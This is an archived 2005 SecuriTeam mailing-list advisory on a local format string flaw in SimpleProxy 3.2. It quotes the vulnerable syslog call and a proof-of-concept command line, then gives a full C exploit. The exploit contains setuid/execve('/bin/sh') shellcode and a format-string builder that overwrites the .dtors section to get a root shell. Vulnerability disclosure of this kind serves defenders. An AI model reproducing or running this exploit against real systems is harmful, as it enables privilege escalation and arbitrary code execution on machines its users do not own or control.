[EXPL] SimpleProxy Local Format String (Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 09/01/05

  • Next message: SecuriTeam: "[NT] Indiatimes Messenger Buffer Overflow (Exploit)" 
    To: list@securiteam.com
Date: 1 Sep 2005 09:34:27 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      SimpleProxy Local Format String (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.sourceforge.net/projects/simpleproxy> simpleproxy acts as a
    simple TCP proxy. It opens a listening socket on the local machine and
    forwards any connection to a remote host. It can be run as a daemon or
    through inetd."

    Due to improper use of user provided data attackers can provide the
    program a format string which in turn can be used to execute arbitrary
    code.

    DETAILS

    Vulnerable Systems:
     * SimpleProxy version 3.2

    Exploit:
    /*
    \ SimpleProxy 3.2 local format string exploit
    -/ by Darkeagle
    \
    -/ syslog() function in simpleproxy.c
    *
    *++++++++++++++++++++++++++++++++++++++++
     static void log(int type, char *format, ...)
     {
     ...
     #if HAVE_SYSLOG
         syslog(type,buffer);
     ...
     }

    static struct lst_record *load_pop3_list(const char *popfile)
    {
     ...
     if(*str=='\0') continue;
            log(LOG_INFO,"Adding '%s' to POP3 users list",str);
     ...
    }
    *++++++++++++++++++++++++++++++++++++++++
    *

    Also exists other vulnerable calls of log() function, including remote
    call
    One more local exists in -P parameter:

    [darkeagle@localhost simpleproxy-3.2]$ ./simpleproxy -L 3337 -R
    localhost:110 -d -v -p1 -f sample.cfg -P AAAA%8$\x
    [darkeagle@localhost simpleproxy-3.2]$ tail -2 /var/log/syslog
    Aug 27 00:14:05 localhost simpleproxy[5755]: Can't open POP3 file:
    AAAA4141203a
    Aug 27 00:14:05 localhost simpleproxy[5756]: Error binding socket.
    [darkeagle@localhost simpleproxy-3.2]$

    very easy to exploit.

    to sploit simpleproxy put in -P parameter 'popa3d.txt' value.
    bug was corrected in latest version (3.4).
    enough.
    \
    -/
    \
    -/
    \
    -/
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    // We must begun !!!

    #define doit( b0, b1, b2, b3, addr ) { \
                 b0 = (addr >> 24) & 0xff; \
                 b1 = (addr >> 16) & 0xff; \
                 b2 = (addr >> 8) & 0xff; \
                 b3 = (addr ) & 0xff; \
    }

    char
    shellcode[]=
            "\x31\xc0"
            "\x31\xdb"
            "\x31\xc9"
            "\xb0\x46"
            "\xcd\x80"
            "\x31\xc0"
            "\x50"
            "\x68\x2f\x2f\x73\x68"
            "\x68\x2f\x62\x69\x6e"
            "\x89\xe3"
            "\x8d\x54\x24\x08"
            "\x50"
            "\x53"
            "\x8d\x0c\x24"
            "\xb0\x0b"
            "\xcd\x80"
            "\x31\xc0"
            "\xb0\x01"
            "\xcd\x80";

    char *
    evil_builder( unsigned int retaddr, unsigned int offset, unsigned int
    base, long figure )
    {
      char * buf;
      unsigned char b0, b1, b2, b3;
      int start = 256;

      doit( b0, b1, b2, b3, retaddr );
      buf = (char *)malloc(999);
      memset( buf, 0, 999 );

     b3 -= figure;
     b2 -= figure;
     b1 -= figure;
     b0 -= figure;

     snprintf( buf, 999,
               "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
                 b3 - (sizeof( size_t ) * 4) + start - base, offset,
                 b2 - b3 + start, offset + 1,
                 b1 - b2 + start, offset + 2,
                 b0 - b1 + start, offset + 3 );

      return buf;
    }

    int
    main( int argc, char * argv[] )
    {
      char * fmt;
      char endian[555];
      unsigned long locaddr, retaddr;
      unsigned int offset, base;
      unsigned char b0, b1, b2, b3;
      FILE *file;

      memset( endian, 0, 555 );

      file = fopen("popa3d.txt", "w+");

      locaddr = 0x804ce20; // dtorz addrz :=)
      retaddr = 0xbfffec54; // shellcode addr
      offset = 5;
      locaddr += 0x4; // dtorz+0x4

      doit( b0, b1, b2, b3, locaddr );

      base = 4;

      snprintf( endian, sizeof(endian),
                "%c%c%c%c"
                "%c%c%c%c"
                "%c%c%c%c"
                "%c%c%c%c",
                 b3, b2, b1, b0,
                 b3 + 1, b2, b1, b0,
                 b3 + 2, b2, b1, b0,
                 b3 + 3, b2, b1, b0 );

     fmt = evil_builder( retaddr, offset, base, 0x4 );
        
     memset(fmt+strlen(fmt), 0x42, 48);
     strcat(fmt, shellcode);
     strcat(endian, fmt);
     fprintf(file, "%s", endian);
     return 0;
    }

    /* EoF */

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:eagle@exploiterz.org>
    Darkeagle.
    The original article can be found at:
    <http://exploiterz.org/simpleprx-exp.c>
    http://exploiterz.org/simpleprx-exp.c

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] Indiatimes Messenger Buffer Overflow (Exploit)"

    Relevant Pages

    • [EXPL] Samba "send_mailslot()" Buffer Overflow Vulnerability (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... void put_name(char *dest, const char *name, int pad, unsigned int ...
      (Securiteam)
    • [EXPL] Snort Back Orifice Preprocessor Buffer Overflow (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... * char buf1; ... unsigned int ret_off; // offset from buf1 to saved eip ...
      (Securiteam)
    • [NT] Microsoft Help Workshop CNT Contents Files Buffer Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Help Workshop is standard component of Microsoft Visual Studio ... first launch it associates the .cnt files with itself), ... unsigned int getStarInf; ...
      (Securiteam)
    • [UNIX] Mpg123 Remote Client-Side Heap Corruption (Exploit, readstring())
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... unsigned int p_requestaddr; ... void printe; ... lists the platforms in a loop. ...
      (Securiteam)
    • [EXPL] PeerCast Remote Format String (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... char shellcode[] = // binds ... evil_builder(unsigned int retaddr, unsigned int offset, unsigned int ... char * buf; ...
      (Securiteam)
    Loading